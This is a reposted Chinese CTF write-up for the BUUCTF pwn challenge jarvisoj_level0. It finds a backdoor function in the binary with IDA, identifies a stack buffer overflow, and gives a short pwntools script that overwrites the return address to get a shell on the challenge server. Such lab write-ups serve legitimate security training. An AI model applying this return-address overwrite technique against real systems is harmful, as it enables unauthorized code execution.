[BUUCTF]PWN8——jarvisoj_level0 - 走看看

zoukankan html css js c++ java

[BUUCTF]PWN8——jarvisoj_level0
[BUUCTF]PWN8——jarvisoj_level0

题目网址：https://buuoj.cn/challenges#jarvisoj_level0

步骤：
例行检查，64位，开启了NX保护

nc一下，看看程序的大概执行流程，回显Hello，world之后让我们输入

用64位ida打开，shift+f12查看字符串，发现了 system 和 /bin/sh

双击跟进，ctrl+x找到调用 /bin/sh 的函数，找到了程序里的后门，shell_addr=0x400596

根据之前nc看到的字符串，找到了输入点，ida给我们分析出来buf的大小是0x80，这边read读入0x200，可以造成溢出，覆盖返回地址为后门地址既可完成利用

exp
```
from pwn import*

r=remote('node3.buuoj.cn',25946)
payload='a'*(0x80+8)+p64(0x400596)
r.sendline(payload)
r.interactive()
```
查看全文

相关阅读:
并查集
 博弈——Bash、Nim、Wythoff
博弈——SG函数模板
 数据结构——二叉树
 数据结构——链式队列
 sonar-maven-plugin问题
 确立核心模型
 调度思路+EurekaServer获得当前机器的instanceid
简易的RestClient代码
 Spring Cloud App(Service) Pom示例

原文地址：https://www.cnblogs.com/xlrp/p/14273726.html

Copyright © 2011-2022 走看看